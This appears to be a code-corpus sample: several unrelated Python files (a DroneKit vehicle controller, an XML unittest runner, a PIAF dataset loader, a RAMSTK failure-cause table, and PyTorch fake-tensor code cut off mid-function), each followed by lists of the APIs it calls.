class VehicleBase(object):
'''
Abstract class, does not implement vehicle methods (takeoff, land, etc.)
'''
def __init__(self, gcs, addr):
self.rel_alt = 0
self.hdg = 0
self.addr = addr
self.gcs = gcs
self.queue = Queue.Queue()
self.gcs.add_listener("message", self.queue_message)
self.handlers = {}
self.vehicle = None
self.add_handler("info", self.info)
def start(self):
print("Connect to url: %s" % self.addr)
self.vehicle = connect(self.addr, wait_ready=True, heartbeat_timeout=15)
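        # Stream position/battery/status from a background thread while run() consumes queued messages.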
thread.start_new_thread(self.send_status_loop, ())
self.run()
def run(self):
while True:
msg = self.queue.get()
if msg is None:
break
self.on_message(msg)
self.queue.task_done()
def queue_message(self, msg):
if msg is not None:
self.queue.put(msg)
def add_handler(self, msg_type, handler):
self.handlers[ msg_type ] = handler
def on_message(self, msg):
typ = msg.get_type()
handler = self.handlers.get(typ, None)
if handler is not None:
res, err = handler(msg.data) or (None, None)
# only reply to requests
if msg.verb == Message.REQ:
self.reply(msg, res, err)
else:
print("unknown message of type '%s'" % typ)
def info(self, data):
conf = Config.get()
return ({
"name": conf.name,
"model": conf.model
}, None)
def reply(self, replyTo, result, error):
msg = Message("reply", {
"id": replyTo.id,
"result": result,
"error": error
})
self.send(msg)
def send(self, msg):
if self.gcs is not None:
self.gcs.send_message(msg)
def takeoff(self, cb):
cb("not implemented")
def land(self, cb):
cb("not implemented")
def rtl(self, cb):
cb("not implemented")
def rc(self, roll, pitch, yaw, throttle, gimbal):
pass
def goto(self, lat, lon, relAlt, cb):
cb("not implemented")
def send_status_loop(self):
conf = Config.get()
while True:
pos = self.vehicle.location.global_relative_frame
hdg = self.vehicle.heading
if pos is not None:
self.send(Message("position", {
"lat": pos.lat,
"lon": pos.lon,
"alt": pos.alt,
"relAlt": pos.alt,
"hdg": hdg
}))
#print("Pos: lat: %s, lon: %s, alt: %s" % (pos.lat, pos.lon, pos.alt))
bat = self.vehicle.battery
if bat is not None:
self.send(Message("battery", {
"current": bat.current,
"percent": bat.level,
"voltage": bat.voltage
}))
#print("Battery: current: %s, percent: %s, voltage: %s" % (bat.current, bat.level, bat.voltage))
self.send(Message("status", {
"armed": self.vehicle.armed
}))
time.sleep(conf.status_period) # send every second
|
[
"config.config.Config.get",
"models.message.Message",
"Queue.Queue",
"thread.start_new_thread",
"dronekit.connect",
"time.sleep"
] |
[((549, 562), 'Queue.Queue', 'Queue.Queue', ([], {}), '()\n', (560, 562), False, 'import Queue\n'), ((817, 874), 'dronekit.connect', 'connect', (['self.addr'], {'wait_ready': '(True)', 'heartbeat_timeout': '(15)'}), '(self.addr, wait_ready=True, heartbeat_timeout=15)\n', (824, 874), False, 'from dronekit import connect\n'), ((883, 933), 'thread.start_new_thread', 'thread.start_new_thread', (['self.send_status_loop', '()'], {}), '(self.send_status_loop, ())\n', (906, 933), False, 'import thread\n'), ((1764, 1776), 'config.config.Config.get', 'Config.get', ([], {}), '()\n', (1774, 1776), False, 'from config.config import Config\n'), ((1937, 2007), 'models.message.Message', 'Message', (['"""reply"""', "{'id': replyTo.id, 'result': result, 'error': error}"], {}), "('reply', {'id': replyTo.id, 'result': result, 'error': error})\n", (1944, 2007), False, 'from models.message import Message\n'), ((2531, 2543), 'config.config.Config.get', 'Config.get', ([], {}), '()\n', (2541, 2543), False, 'from config.config import Config\n'), ((3528, 3558), 'time.sleep', 'time.sleep', (['conf.status_period'], {}), '(conf.status_period)\n', (3538, 3558), False, 'import time\n'), ((3435, 3483), 'models.message.Message', 'Message', (['"""status"""', "{'armed': self.vehicle.armed}"], {}), "('status', {'armed': self.vehicle.armed})\n", (3442, 3483), False, 'from models.message import Message\n'), ((2724, 2828), 'models.message.Message', 'Message', (['"""position"""', "{'lat': pos.lat, 'lon': pos.lon, 'alt': pos.alt, 'relAlt': pos.alt, 'hdg': hdg}"], {}), "('position', {'lat': pos.lat, 'lon': pos.lon, 'alt': pos.alt,\n 'relAlt': pos.alt, 'hdg': hdg})\n", (2731, 2828), False, 'from models.message import Message\n'), ((3129, 3223), 'models.message.Message', 'Message', (['"""battery"""', "{'current': bat.current, 'percent': bat.level, 'voltage': bat.voltage}"], {}), "('battery', {'current': bat.current, 'percent': bat.level, 'voltage':\n bat.voltage})\n", (3136, 3223), False, 'from models.message import Message\n')]
|
# -*- coding: utf-8 -*-
"""
This module provides the XMLTestRunner class, which is heavily based on the
default TextTestRunner.
"""
import os
import sys
import time
import codecs
try:
from unittest2.runner import TextTestRunner
from unittest2.runner import TextTestResult as _TextTestResult
from unittest2.result import TestResult
except ImportError:
from unittest import TestResult, _TextTestResult, TextTestRunner
try:
# Removed in Python 3
from cStringIO import StringIO
except ImportError:
from io import StringIO
if sys.version_info[0] >= 3:
unicode=str
class _DelegateIO(object):
"""
This class defines an object that captures whatever is written to
a stream or file.
"""
def __init__(self, delegate):
self._captured = StringIO()
self.delegate = delegate
def write(self, text):
self._captured.write(text)
self.delegate.write(text)
def __getattr__(self, attr):
return getattr(self._captured, attr)
def testcase_name(test_method):
testcase = type(test_method)
# Ignore module name if it is '__main__'
module = testcase.__module__ + '.'
if module == '__main__.':
module = ''
result = module + testcase.__name__
return result
class _TestInfo(object):
"""
This class keeps useful information about the execution of a
test method.
"""
# Possible test outcomes
(SUCCESS, FAILURE, ERROR, SKIP) = range(4)
def __init__(self, test_result, test_method, outcome=SUCCESS, err=None):
self.test_result = test_result
self.test_method = test_method
self.outcome = outcome
self.elapsed_time = 0
self.err = err
self.test_description = self.test_result.getDescription(test_method)
self.test_exception_info = (
'' if outcome in (self.SUCCESS, self.SKIP)
else self.test_result._exc_info_to_string(
self.err, test_method)
)
self.test_name = testcase_name(test_method)
self.test_id = test_method.id()
def id(self):
return self.test_method.id()
def test_finished(self):
"""Save info that can only be calculated once a test has run.
"""
self.elapsed_time = \
self.test_result.stop_time - self.test_result.start_time
def get_description(self):
"""
Return a text representation of the test method.
"""
return self.test_description
def get_error_info(self):
"""
Return a text representation of an exception thrown by a test
method.
"""
return self.test_exception_info
class _XMLTestResult(_TextTestResult):
"""
A test result class that can express test results in a XML report.
Used by XMLTestRunner.
"""
def __init__(self, stream=sys.stderr, descriptions=1, verbosity=1,
elapsed_times=True):
_TextTestResult.__init__(self, stream, descriptions, verbosity)
self.successes = []
self.skipped=[]
self.callback = None
self.elapsed_times = elapsed_times
def _prepare_callback(self, test_info, target_list, verbose_str,
short_str):
"""
Appends a _TestInfo to the given target list and sets a callback
method to be called by stopTest method.
"""
target_list.append(test_info)
def callback():
"""Prints the test method outcome to the stream, as well as
the elapsed time.
"""
test_info.test_finished()
# Ignore the elapsed times for a more reliable unit testing
if not self.elapsed_times:
self.start_time = self.stop_time = 0
if self.showAll:
self.stream.writeln(
'%s (%.3fs)' % (verbose_str, test_info.elapsed_time)
)
elif self.dots:
self.stream.write(short_str)
self.callback = callback
def startTest(self, test):
"""
Called before execute each test method.
"""
self.start_time = time.time()
TestResult.startTest(self, test)
if self.showAll:
self.stream.write(' ' + self.getDescription(test))
self.stream.write(" ... ")
def stopTest(self, test):
"""
Called after execute each test method.
"""
_TextTestResult.stopTest(self, test)
self.stop_time = time.time()
if self.callback and callable(self.callback):
self.callback()
self.callback = None
def addSuccess(self, test):
"""
Called when a test executes successfully.
"""
self._prepare_callback(
_TestInfo(self, test), self.successes, 'OK', '.'
)
def addFailure(self, test, err):
"""
Called when a test method fails.
"""
        testinfo = _TestInfo(self, test, _TestInfo.FAILURE, err)
        self.failures.append((
testinfo,
self._exc_info_to_string(err, test)
))
self._prepare_callback(testinfo, [], 'FAIL', 'F')
def addError(self, test, err):
"""
Called when a test method raises an error.
"""
testinfo = _TestInfo(self, test, _TestInfo.ERROR, err)
self.errors.append((
testinfo,
self._exc_info_to_string(err, test)
))
self._prepare_callback(testinfo, [], 'ERROR', 'E')
def addSkip(self, test, reason):
"""
Called when a test method was skipped.
"""
testinfo = _TestInfo(self, test, _TestInfo.SKIP, reason)
self.skipped.append((testinfo, reason))
self._prepare_callback(testinfo, [], 'SKIP', 'S')
def printErrorList(self, flavour, errors):
"""
Writes information about the FAIL or ERROR to the stream.
"""
for test_info, error in errors:
self.stream.writeln(self.separator1)
self.stream.writeln(
'%s [%.3fs]: %s' % (flavour, test_info.elapsed_time,
test_info.get_description())
)
self.stream.writeln(self.separator2)
self.stream.writeln('%s' % test_info.get_error_info())
def _get_info_by_testcase(self, outsuffix):
"""
Organizes test results by TestCase module. This information is
used during the report generation, where a XML report will be created
for each TestCase.
"""
tests_by_testcase = {}
for tests in (self.successes, self.failures, self.errors, self.skipped):
for test_info in tests:
if isinstance(test_info, tuple):
# This is a skipped, error or a failure test case
test_info = test_info[0]
testcase_name = test_info.test_name
if not testcase_name in tests_by_testcase:
tests_by_testcase[testcase_name] = []
tests_by_testcase[testcase_name].append(test_info)
return tests_by_testcase
def _report_testsuite(suite_name, outsuffix, tests, testsuites, xml_document):
"""
Appends the testsuite section to the XML document.
"""
testsuite = xml_document.createElement('testsuite')
testsuites.appendChild(testsuite)
testsuite.setAttribute('name', "%s-%s" % (suite_name, outsuffix))
testsuite.setAttribute('tests', str(len(tests)))
testsuite.setAttribute(
'time', '%.3f' % sum(map(lambda e: e.elapsed_time, tests))
)
failures = filter(lambda e: e.outcome == _TestInfo.FAILURE, tests)
testsuite.setAttribute('failures', str(len(list(failures))))
errors = filter(lambda e: e.outcome == _TestInfo.ERROR, tests)
testsuite.setAttribute('errors', str(len(list(errors))))
return testsuite
_report_testsuite = staticmethod(_report_testsuite)
def _test_method_name(test_id):
"""
Returns the test method name.
"""
return test_id.split('.')[-1]
_test_method_name = staticmethod(_test_method_name)
def _report_testcase(suite_name, test_result, xml_testsuite, xml_document):
"""
Appends a testcase section to the XML document.
"""
testcase = xml_document.createElement('testcase')
xml_testsuite.appendChild(testcase)
testcase.setAttribute(
'name', '%s.%s'%(suite_name,_XMLTestResult._test_method_name(test_result.test_id))
)
testcase.setAttribute('time', '%.3f' % test_result.elapsed_time)
status='pass'
if (test_result.outcome != _TestInfo.SUCCESS):
status = ('failure', 'error', 'skipped')[test_result.outcome - 1]
failure = xml_document.createElement(status)
testcase.appendChild(failure)
if test_result.outcome != _TestInfo.SKIP:
failure.setAttribute('type', test_result.err[0].__name__)
failure.setAttribute('message', unicode(test_result.err[1])) # don't use str(), breaks on py2
error_info = unicode(test_result.get_error_info())
failureText = xml_document.createCDATASection(error_info)
failure.appendChild(failureText)
else:
failure.setAttribute('type', 'skip')
failure.setAttribute('message', test_result.err)
testcase.setAttribute('status', status)
_report_testcase = staticmethod(_report_testcase)
def _report_output(test_runner, xml_testsuite, xml_document):
"""
Appends the system-out and system-err sections to the XML document.
"""
systemout = xml_document.createElement('system-out')
xml_testsuite.appendChild(systemout)
systemout_text = xml_document.createCDATASection(sys.stdout.getvalue())
systemout.appendChild(systemout_text)
systemerr = xml_document.createElement('system-err')
xml_testsuite.appendChild(systemerr)
systemerr_text = xml_document.createCDATASection(sys.stderr.getvalue())
systemerr.appendChild(systemerr_text)
_report_output = staticmethod(_report_output)
def generate_reports(self, test_runner):
"""
Generates the XML reports to a given XMLTestRunner object.
"""
from xml.dom.minidom import Document
all_results = self._get_info_by_testcase(test_runner.outsuffix)
if (isinstance(test_runner.output, str) and not
os.path.exists(test_runner.output)):
os.makedirs(test_runner.output)
doc = Document()
testsuites = doc.createElement('testsuites')
doc.appendChild(testsuites)
nbTestCases=0
nbTestErrors=0
nbTestFailures=0
timeAllTests=0
for suite, tests in all_results.items():
# Build the XML file
testsuite = _XMLTestResult._report_testsuite(
suite, test_runner.outsuffix, tests, testsuites, doc
)
for test in tests:
_XMLTestResult._report_testcase(suite, test, testsuite, doc)
nbTestCases=nbTestCases+1
if test.outcome==_TestInfo.ERROR:
nbTestErrors+=1
if test.outcome==_TestInfo.FAILURE:
nbTestFailures+=1
                timeAllTests += test.elapsed_time
testsuites.setAttribute("tests","%s"%nbTestCases)
testsuites.setAttribute("failures","%s"%nbTestFailures)
testsuites.setAttribute("errors","%s"%nbTestErrors)
testsuites.setAttribute("time","%s"%timeAllTests)
_XMLTestResult._report_output(test_runner, testsuite, doc)
xml_content = doc.toprettyxml(indent='\t')
try:
# python>2.7
xml_content = xml_content.decode('utf-8',errors='replace')
except:
# python2.6
xml_content = xml_content.decode('utf-8','replace')
report_file = codecs.open(
'%s%s%s' % (
test_runner.output, os.sep,
test_runner.outsuffix
), 'w', 'utf-8')
report_file.write(xml_content)
report_file.close()
class XMLTestRunner(TextTestRunner):
"""
A test runner class that outputs the results in JUnit like XML files.
"""
def __init__(self, output='.', outsuffix=None, stream=sys.stderr,
descriptions=True, verbosity=1, elapsed_times=True):
TextTestRunner.__init__(self, stream, descriptions, verbosity)
self.verbosity = verbosity
self.output = output
if outsuffix:
self.outsuffix = outsuffix
else:
self.outsuffix = time.strftime("%Y%m%d%H%M%S")
self.elapsed_times = elapsed_times
def _make_result(self):
"""
Creates a TestResult object which will be used to store
information about the executed tests.
"""
return _XMLTestResult(
self.stream, self.descriptions, self.verbosity, self.elapsed_times
)
def _patch_standard_output(self):
"""
Replaces stdout and stderr streams with string-based streams
in order to capture the tests' output.
"""
sys.stdout = _DelegateIO(sys.stdout)
sys.stderr = _DelegateIO(sys.stderr)
def _restore_standard_output(self):
"""
Restores stdout and stderr streams.
"""
sys.stdout = sys.stdout.delegate
sys.stderr = sys.stderr.delegate
def run(self, test):
"""
Runs the given test case or test suite.
"""
try:
# Prepare the test execution
self._patch_standard_output()
result = self._make_result()
# Print a nice header
self.stream.writeln()
self.stream.writeln('Running tests...')
self.stream.writeln(result.separator2)
# Execute tests
start_time = time.time()
test(result)
stop_time = time.time()
time_taken = stop_time - start_time
# Print results
result.printErrors()
self.stream.writeln(result.separator2)
run = result.testsRun
self.stream.writeln("Ran %d test%s in %.3fs" % (
run, run != 1 and "s" or "", time_taken)
)
self.stream.writeln()
expectedFails = unexpectedSuccesses = skipped = 0
try:
results = map(len, (result.expectedFailures,
result.unexpectedSuccesses,
result.skipped))
except AttributeError:
pass
else:
expectedFails, unexpectedSuccesses, skipped = results
# Error traces
infos = []
if not result.wasSuccessful():
self.stream.write("FAILED")
failed, errored = map(len, (result.failures, result.errors))
if failed:
infos.append("failures={0}".format(failed))
if errored:
infos.append("errors={0}".format(errored))
else:
self.stream.write("OK")
if skipped:
infos.append("skipped={0}".format(skipped))
if expectedFails:
infos.append("expected failures={0}".format(expectedFails))
if unexpectedSuccesses:
infos.append("unexpected successes={0}".format(unexpectedSuccesses))
if infos:
self.stream.writeln(" ({0})".format(", ".join(infos)))
else:
self.stream.write("\n")
# Generate reports
self.stream.writeln()
self.stream.writeln('Generating XML reports...')
result.generate_reports(self)
finally:
self._restore_standard_output()
return result
|
[
"xml.dom.minidom.Document",
"io.StringIO",
"unittest.TestResult.startTest",
"codecs.open",
"os.makedirs",
"unittest.TextTestRunner.__init__",
"sys.stderr.getvalue",
"os.path.exists",
"time.strftime",
"unittest._TextTestResult.__init__",
"time.time",
"unittest._TextTestResult.stopTest",
"sys.stdout.getvalue"
] |
[((791, 801), 'io.StringIO', 'StringIO', ([], {}), '()\n', (799, 801), False, 'from io import StringIO\n'), ((2955, 3018), 'unittest._TextTestResult.__init__', '_TextTestResult.__init__', (['self', 'stream', 'descriptions', 'verbosity'], {}), '(self, stream, descriptions, verbosity)\n', (2979, 3018), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4175, 4186), 'time.time', 'time.time', ([], {}), '()\n', (4184, 4186), False, 'import time\n'), ((4195, 4227), 'unittest.TestResult.startTest', 'TestResult.startTest', (['self', 'test'], {}), '(self, test)\n', (4215, 4227), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4467, 4503), 'unittest._TextTestResult.stopTest', '_TextTestResult.stopTest', (['self', 'test'], {}), '(self, test)\n', (4491, 4503), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4529, 4540), 'time.time', 'time.time', ([], {}), '()\n', (4538, 4540), False, 'import time\n'), ((10756, 10766), 'xml.dom.minidom.Document', 'Document', ([], {}), '()\n', (10764, 10766), False, 'from xml.dom.minidom import Document\n'), ((12159, 12252), 'codecs.open', 'codecs.open', (["('%s%s%s' % (test_runner.output, os.sep, test_runner.outsuffix))", '"""w"""', '"""utf-8"""'], {}), "('%s%s%s' % (test_runner.output, os.sep, test_runner.outsuffix),\n 'w', 'utf-8')\n", (12170, 12252), False, 'import codecs\n'), ((12686, 12748), 'unittest.TextTestRunner.__init__', 'TextTestRunner.__init__', (['self', 'stream', 'descriptions', 'verbosity'], {}), '(self, stream, descriptions, verbosity)\n', (12709, 12748), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((9979, 10000), 'sys.stdout.getvalue', 'sys.stdout.getvalue', ([], {}), '()\n', (9998, 10000), False, 'import sys\n'), ((10213, 10234), 'sys.stderr.getvalue', 'sys.stderr.getvalue', ([], {}), '()\n', (10232, 10234), False, 'import sys\n'), ((10709, 10740), 'os.makedirs', 'os.makedirs', (['test_runner.output'], {}), '(test_runner.output)\n', (10720, 10740), False, 'import os\n'), ((12917, 12946), 'time.strftime', 'time.strftime', (['"""%Y%m%d%H%M%S"""'], {}), "('%Y%m%d%H%M%S')\n", (12930, 12946), False, 'import time\n'), ((14194, 14205), 'time.time', 'time.time', ([], {}), '()\n', (14203, 14205), False, 'import time\n'), ((14255, 14266), 'time.time', 'time.time', ([], {}), '()\n', (14264, 14266), False, 'import time\n'), ((10660, 10694), 'os.path.exists', 'os.path.exists', (['test_runner.output'], {}), '(test_runner.output)\n', (10674, 10694), False, 'import os\n')]
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""PIAF Question Answering Dataset"""
from __future__ import absolute_import, division, print_function
import json
import logging
import datasets
_CITATION = """\
@InProceedings{keraron-EtAl:2020:LREC,
author = {<NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
title = {Project PIAF: Building a Native French Question-Answering Dataset},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference},
month = {May},
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association},
pages = {5483--5492},
abstract = {Motivated by the lack of data for non-English languages, in particular for the evaluation of downstream tasks such as Question Answering, we present a participatory effort to collect a native French Question Answering Dataset. Furthermore, we describe and publicly release the annotation tool developed for our collection effort, along with the data obtained and preliminary baselines.},
url = {https://www.aclweb.org/anthology/2020.lrec-1.673}
}
"""
_DESCRIPTION = """\
Piaf is a reading comprehension \
dataset. This version, published in February 2020, contains 3835 questions on French Wikipedia.
"""
_URLS = {"train": "https://github.com/etalab-ia/piaf-code/raw/master/piaf-v1.0.json"}
class PiafConfig(datasets.BuilderConfig):
"""BuilderConfig for PIAF."""
def __init__(self, **kwargs):
"""BuilderConfig for PIAF.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(PiafConfig, self).__init__(**kwargs)
class Piaf(datasets.GeneratorBasedBuilder):
"""The Piaf Question Answering Dataset. Version 1.0."""
BUILDER_CONFIGS = [
PiafConfig(
name="plain_text",
version=datasets.Version("1.0.0", ""),
description="Plain text",
),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"title": datasets.Value("string"),
"context": datasets.Value("string"),
"question": datasets.Value("string"),
"answers": datasets.features.Sequence(
{
"text": datasets.Value("string"),
"answer_start": datasets.Value("int32"),
}
),
}
),
# No default supervised_keys (as we have to pass both question
# and context as input).
supervised_keys=None,
homepage="https://piaf.etalab.studio",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
urls_to_download = _URLS
downloaded_files = dl_manager.download_and_extract(urls_to_download)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": downloaded_files["train"]}),
]
def _generate_examples(self, filepath):
"""This function returns the examples in the raw (text) form."""
logging.info("generating examples from = %s", filepath)
with open(filepath, encoding="utf-8") as f:
dataset = json.load(f)
for article in dataset["data"]:
title = article.get("title", "").strip()
for paragraph in article["paragraphs"]:
context = paragraph["context"].strip()
for qa in paragraph["qas"]:
question = qa["question"].strip()
id_ = qa["id"]
answer_starts = [answer["answer_start"] for answer in qa["answers"]]
answers = [answer["text"].strip() for answer in qa["answers"]]
# Features currently used are "context", "question", and "answers".
# Others are extracted here for the ease of future expansions.
yield id_, {
"title": title,
"context": context,
"question": question,
"id": id_,
"answers": {
"answer_start": answer_starts,
"text": answers,
},
}
|
[
"json.load",
"datasets.SplitGenerator",
"datasets.Value",
"logging.info",
"datasets.Version"
] |
[((3975, 4030), 'logging.info', 'logging.info', (['"""generating examples from = %s"""', 'filepath'], {}), "('generating examples from = %s', filepath)\n", (3987, 4030), False, 'import logging\n'), ((3735, 3841), 'datasets.SplitGenerator', 'datasets.SplitGenerator', ([], {'name': 'datasets.Split.TRAIN', 'gen_kwargs': "{'filepath': downloaded_files['train']}"}), "(name=datasets.Split.TRAIN, gen_kwargs={'filepath':\n downloaded_files['train']})\n", (3758, 3841), False, 'import datasets\n'), ((4105, 4117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4114, 4117), False, 'import json\n'), ((2549, 2578), 'datasets.Version', 'datasets.Version', (['"""1.0.0"""', '""""""'], {}), "('1.0.0', '')\n", (2565, 2578), False, 'import datasets\n'), ((2816, 2840), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2830, 2840), False, 'import datasets\n'), ((2871, 2895), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2885, 2895), False, 'import datasets\n'), ((2928, 2952), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2942, 2952), False, 'import datasets\n'), ((2986, 3010), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (3000, 3010), False, 'import datasets\n'), ((3133, 3157), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (3147, 3157), False, 'import datasets\n'), ((3203, 3226), 'datasets.Value', 'datasets.Value', (['"""int32"""'], {}), "('int32')\n", (3217, 3226), False, 'import datasets\n')]
|
#!/usr/bin/env python3
import json
import yaml
try:
from urllib import request
except ImportError:
import urllib2 as request
with request.urlopen("https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false") as stream:
#with open("project.yml", 'r') as stream:
data_loaded = yaml.safe_load(stream)
data = data_loaded['instances']
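# Write the instance list out as a JavaScript constant assignment.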
with open('js/instances.js', 'w') as outfile:
outfile.write("const instances = ")
json.dump(data, outfile)
outfile.write(";")
|
[
"json.dump",
"yaml.safe_load",
"urllib2.urlopen"
] |
[((140, 255), 'urllib2.urlopen', 'request.urlopen', (['"""https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false"""'], {}), "(\n 'https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false'\n )\n", (155, 255), True, 'import urllib2 as request\n'), ((321, 343), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (335, 343), False, 'import yaml\n'), ((482, 506), 'json.dump', 'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (491, 506), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
#
# ramstk.models.programdb.cause.table.py is part of The RAMSTK Project
#
# All rights reserved.
# Copyright since 2007 Doyle "weibullguy" Rowland doyle.rowland <AT> reliaqual <DOT> com
"""Failure Cause Package Data Controller."""
# Standard Library Imports
from typing import Any, Dict, Type
# Third Party Imports
from pubsub import pub
# RAMSTK Package Imports
from ramstk.analyses import criticality
from ramstk.models import RAMSTKBaseTable, RAMSTKCauseRecord
class RAMSTKCauseTable(RAMSTKBaseTable):
"""Contain the attributes and methods of the Cause data manager."""
# Define private dictionary class attributes.
# Define private list class attributes.
# Define private scalar class attributes.
_db_id_colname = "fld_cause_id"
_db_tablename = "ramstk_cause"
_select_msg = "selected_revision"
_tag = "cause"
# Define public dictionary class attributes.
# Define public list class attributes.
# Define public scalar class attributes.
def __init__(self, **kwargs: Dict[str, Any]) -> None:
"""Initialize a Cause data manager instance."""
super().__init__(**kwargs)
# Initialize private dictionary attributes.
# Initialize private list attributes.
self._lst_id_columns = [
"revision_id",
"hardware_id",
"mode_id",
"mechanism_id",
"cause_id",
]
# Initialize private scalar attributes.
self._record: Type[RAMSTKCauseRecord] = RAMSTKCauseRecord
# Initialize public dictionary attributes.
# Initialize public list attributes.
# Initialize public scalar attributes.
self.pkey = "cause_id"
# Subscribe to PyPubSub messages.
pub.subscribe(self.do_calculate_rpn, "request_calculate_cause_rpn")
def do_get_new_record( # pylint: disable=method-hidden
self, attributes: Dict[str, Any]
) -> object:
"""Gets a new record instance with attributes set.
:param attributes: the dict of attribute values to assign to the new record.
        :return: the new record instance with its ID fields set.
        :rtype: object
"""
_new_record = self._record()
_new_record.revision_id = attributes["revision_id"]
_new_record.hardware_id = attributes["hardware_id"]
_new_record.mode_id = attributes["mode_id"]
_new_record.mechanism_id = attributes["mechanism_id"]
_new_record.cause_id = self.last_id + 1
_new_record.parent_id = attributes["mechanism_id"]
return _new_record
def do_calculate_rpn(self, severity: int) -> None:
"""Calculate the risk priority number (RPN) of a hardware item's modes.
.. note:: the severity (S) value will always be associated with a
failure mode.
.. note:: the occurrence (O) and detection (D) values may be
associated with a failure mechanism or a failure cause. Typically,
            hardware FMEAs use mechanisms and functional FMEAs use causes.
:param severity: the RPN severity value.
:return: None
:rtype: None
"""
_sod = {"rpn_severity": severity, "rpn_occurrence": 10, "rpn_detection": 10}
for _node in self.tree.all_nodes()[1:]:
_sod["rpn_occurrence"] = _node.data[self._tag].rpn_occurrence
_sod["rpn_detection"] = _node.data[self._tag].rpn_detection
_node.data[self._tag].rpn = criticality.calculate_rpn(_sod)
_sod["rpn_occurrence"] = _node.data[self._tag].rpn_occurrence_new
_sod["rpn_detection"] = _node.data[self._tag].rpn_detection_new
_node.data[self._tag].rpn_new = criticality.calculate_rpn(_sod)
pub.sendMessage(
"succeed_calculate_cause_rpn",
tree=self.tree,
)
|
[
"ramstk.analyses.criticality.calculate_rpn",
"pubsub.pub.subscribe",
"pubsub.pub.sendMessage"
] |
[((1789, 1856), 'pubsub.pub.subscribe', 'pub.subscribe', (['self.do_calculate_rpn', '"""request_calculate_cause_rpn"""'], {}), "(self.do_calculate_rpn, 'request_calculate_cause_rpn')\n", (1802, 1856), False, 'from pubsub import pub\n'), ((3759, 3821), 'pubsub.pub.sendMessage', 'pub.sendMessage', (['"""succeed_calculate_cause_rpn"""'], {'tree': 'self.tree'}), "('succeed_calculate_cause_rpn', tree=self.tree)\n", (3774, 3821), False, 'from pubsub import pub\n'), ((3487, 3518), 'ramstk.analyses.criticality.calculate_rpn', 'criticality.calculate_rpn', (['_sod'], {}), '(_sod)\n', (3512, 3518), False, 'from ramstk.analyses import criticality\n'), ((3718, 3749), 'ramstk.analyses.criticality.calculate_rpn', 'criticality.calculate_rpn', (['_sod'], {}), '(_sod)\n', (3743, 3749), False, 'from ramstk.analyses import criticality\n')]
|
import torch
from torch.utils._pytree import tree_map, tree_flatten
from functools import partial
from torch.fx.operator_schemas import normalize_function
from torch.utils._mode_utils import no_dispatch
from torch._subclasses.meta_utils import MetaConverter
from typing import Union, Callable
from torch._ops import OpOverload
from torch.overrides import TorchFunctionMode
from torch.utils._python_dispatch import TorchDispatchMode, enable_torch_dispatch_mode
import weakref
import functools
import itertools
from dataclasses import dataclass
aten = torch.ops.aten
@dataclass
class UnsupportedFakeTensorException(RuntimeError):
reason: str
@dataclass
class DynamicOutputShapeException(RuntimeError):
func: OpOverload
_device_not_kwarg_ops = (
aten._resize_output_.default,
aten.nested_tensor.default,
aten.pin_memory.default,
aten.is_pinned.default,
aten.to.device,
aten.to.prim_Device,
aten._pin_memory.default,
aten._resize_output.functional,
aten._resize_output.out,
)
# this op is never actually used
_non_kwarg_device_constructors = (torch.ops.aten._list_to_tensor,)
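# True if a JIT schema type is a Tensor type or (recursively) contains one.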
def contains_tensor_types(type):
tensor_type = torch._C.TensorType.get()
return type.isSubtypeOf(tensor_type) or any(
contains_tensor_types(e) for e in type.containedTypes()
)
_like_tensor_constructors = (
aten.empty_like.default,
aten.full_like.default,
aten.ones_like.default,
aten.rand_like.default,
aten.randn_like.default,
aten.randint_like.default,
aten.randint_like.low_dtype,
aten.randn_like.default,
aten.zeros_like.default,
aten.new_empty.default,
aten.new_empty_strided.default,
aten.new_full.default,
aten.new_zeros.default,
aten.new_ones.default,
)
@functools.lru_cache(None)
def _is_tensor_constructor(func: OpOverload):
assert isinstance(func, OpOverload)
schema = func._schema
if any(contains_tensor_types(arg.type) for arg in schema.arguments):
return False
# TODO: no real reason to restrict multiple outputs
return (
len(schema.returns) == 1 and schema.returns[0].type is torch._C.TensorType.get()
)
# Similar to `MetaConverter`, this is a class for converting
# multiple tensors into fake tensors which share the same view/storage
# structure. Like `MetaConverter`, it will keep alive all
# tensors that are converted to FakeTensors.
class FakeTensorConverter(object):
tensor_memo: weakref.WeakValueDictionary
meta_converter: MetaConverter
def __init__(self):
# FakeTensors store the FakeTensorMode which in turn stores a
# FakeTensor, so we need to hold a weak reference to the FakeTensor
# otherwise we would induce a circular reference
self.tensor_memo = weakref.WeakValueDictionary()
self.meta_converter = MetaConverter()
def _get_memo(self, t):
if t in self.tensor_memo:
